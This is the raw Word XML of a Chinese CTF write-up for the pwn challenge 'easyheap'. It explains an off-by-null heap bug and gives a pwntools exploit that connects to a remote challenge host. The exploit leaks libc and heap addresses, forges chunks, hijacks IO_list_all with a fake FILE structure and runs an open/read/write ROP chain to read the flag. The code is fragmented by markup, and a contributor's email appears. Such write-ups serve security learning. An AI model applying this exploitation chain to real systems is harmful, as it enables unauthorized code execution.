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BB15" w14:textId="36F00F59" w:rsidR="00437A38" w:rsidRDefault="002B06C3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86680C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>1504895347@</w:t>
        </w:r>
        <w:r w:rsidRPr="0086680C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>qq</w:t>
        </w:r>
        <w:r w:rsidRPr="0086680C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19207DCD" w14:textId="77777777" w:rsidR="002B06C3" w:rsidRDefault="002B06C3"/>
    <w:p w14:paraId="62BEDDC1" w14:textId="27CBCF1E" w:rsidR="002B06C3" w:rsidRDefault="002B06C3">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn:easyheap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="617712FD" w14:textId="77777777" w:rsidR="00697E81" w:rsidRDefault="00697E81"/>
    <w:p w14:paraId="66CE7CD2" w14:textId="5ED3271F" w:rsidR="00697E81" w:rsidRDefault="00697E81">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
      <w:r w:rsidR="008B2BB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF6B54A" w14:textId="19FE0C6A" w:rsidR="008B2BB8" w:rsidRDefault="006802BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用ida64打开附件CAT_DE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF693A0" w14:textId="0CF2E6BE" w:rsidR="006802BF" w:rsidRDefault="006802BF">
      <w:r w:rsidRPr="006802BF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D8AC7E9" wp14:editId="0216A854">
            <wp:extent cx="5274310" cy="1831340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2038791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91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B3D" w14:textId="1FB5F20D" w:rsidR="006802BF" w:rsidRDefault="006802BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上方是有漏洞的函数。具体为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>off_by_null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，需要满足被释放块</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能找到触发块，并且出发快</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等于被释放的size。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址和堆地址，直接伪造堆，再用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>off_by_null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inuse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，释放被溢出块合并形成堆块重叠就行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E5A66C" w14:textId="16C2D235" w:rsidR="008B2BB8" w:rsidRDefault="008B2BB8">
      <w:r w:rsidRPr="008B2BB8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B06F792" wp14:editId="760DB80E">
            <wp:extent cx="5274310" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1012753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53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EAA" w14:textId="3FC909DA" w:rsidR="008B2BB8" w:rsidRDefault="008B2BB8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4FEE7D" w14:textId="2668CFF4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CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pwn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087CE856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2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'182.92.237.102'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2122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AE9E43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pwn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2BB8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gramEnd"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAT_DE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E3E113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libc_path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2BB8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gramEnd"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>libc.so.6'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E755C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2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ELF(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>libc_path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2933F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ptr_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xor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8BC94EE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p64((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ptr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AA3963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send_cmd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E687D61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"input your car choice &gt;&gt;"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9EDA17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E2174C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488E621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send_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cmd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F16DE8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"size:"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124907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F88732C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"content:"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0B752D4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.send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F13B7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delete_car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882799A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send_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cmd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07FE616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B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178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AA850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9BD34E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show_car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AA285EA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send_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cmd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F8243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B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178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934E3E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F2D73B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edit_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DBC3EF7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send_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cmd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9C878A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B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178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AC8655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4E5BFC8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"content:"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CFB466D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.send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EC9BD95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C7ACBE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DEC4CE8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4F35C6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CED06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delete_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31F148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delete_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646A85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9574F7A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show_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90E007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"context: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1EF24D1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u64(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219c00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E642935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heap_base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u64(</w:t>
      </w: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290</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138DDACE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'flag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40FD0C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IO_list_all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21a680</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC82D45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37D6989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4f0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D4692D3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77B6B6B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4D49548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fake_chunk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heap_base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11e0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6FA17C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201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fake_chunk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fake_chunk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92B99B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.ljust(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2E76BEA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edit_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23CC8C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delete_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6AD6D9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C1215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27FC24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delete_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500B125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delete_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6989788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lastRenderedPageBreak/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ptr_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xor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8B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fake_chunk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IO_list_all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FA140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.ljust(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DE0471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edit_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pay1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A5D1E9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16C7CC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add_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,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fake_chunk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9FA941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fake_io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fake_chunk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110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0EFA24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IO_wfile_jumps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2160c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129EDFC4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t>setcontext_61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53a30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61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB2DE1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open_addr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.sym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'open'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61BFC1D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read_addr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.sym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'read'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AA3A33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write_addr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.sym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'write'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2BAA95C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562ed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0029D3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str_flag_addr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heap_base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2a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67518A26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pop_rdi_ret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2a3e5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DAF71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pop_rsi_ret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2be51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0618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pop_rdx_rbx_ret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90529</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99A1CC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rop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pop_rdi_ret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str_flag_addr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pop_rsi_ret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open_addr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6E10CC3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rop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pop_rdi_ret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pop_rsi_ret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fake_chunk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pop_rdx_rbx_ret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read_addr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B38634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rop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pop_rdi_ret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write_addr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307247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B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flat(</w:t>
      </w:r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99CCB2A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fake_io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138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5F2AB4AA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a0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[p64(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fake_io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0461D69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c0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387344B7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d8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[p64(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IO_wfile_jumps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391FE7BD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[p64(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fake_io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)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180A0D89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gramStart"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flat(</w:t>
      </w:r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4B60C5F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[p64(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setcontext_61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67057CEA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},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896062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138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gramStart"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flat(</w:t>
      </w:r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E761A2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fake_io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1e8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3D4F3F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7B9F7F33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0DFC422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a0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p64(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fake_io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1e8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37428E4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a8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 p64(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A5172D1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},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51AE9A69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1e8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gramStart"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flat(</w:t>
      </w:r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26689DC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r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22C37CFD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    },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09EB500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},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filler</w:t>
      </w:r>
      <w:r w:rsidRPr="008B2B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D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="008B2B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929898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edit_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car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B2BB8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B2BB8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8B2BB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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F4BFA8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B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B2B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B2BB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6971F6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8B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>conn</w:t>
      </w:r>
      <w:r w:rsidRPr="008B2BB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B2BB8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6145D3B7" w14:textId="77777777" w:rsidR="008B2BB8" w:rsidRPr="008B2BB8" w:rsidRDefault="008B2BB8" w:rsidP="008B2B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A9F7BB" w14:textId="77777777" w:rsidR="008B2BB8" w:rsidRDefault="008B2BB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008B2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C7"/>
    <w:rsid w:val="0007689C"/>
    <w:rsid w:val="000C6EC7"/>
    <w:rsid w:val="002B06C3"/>
    <w:rsid w:val="00437A38"/>
    <w:rsid w:val="00464929"/>
    <w:rsid w:val="006802BF"/>
    <w:rsid w:val="00697E81"/>
    <w:rsid w:val="008B2BB8"/>
    <w:rsid w:val="009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03D3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EFCAACE0-142F-4E49-8A8F-79D344F7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6C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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-24T08:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T09:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>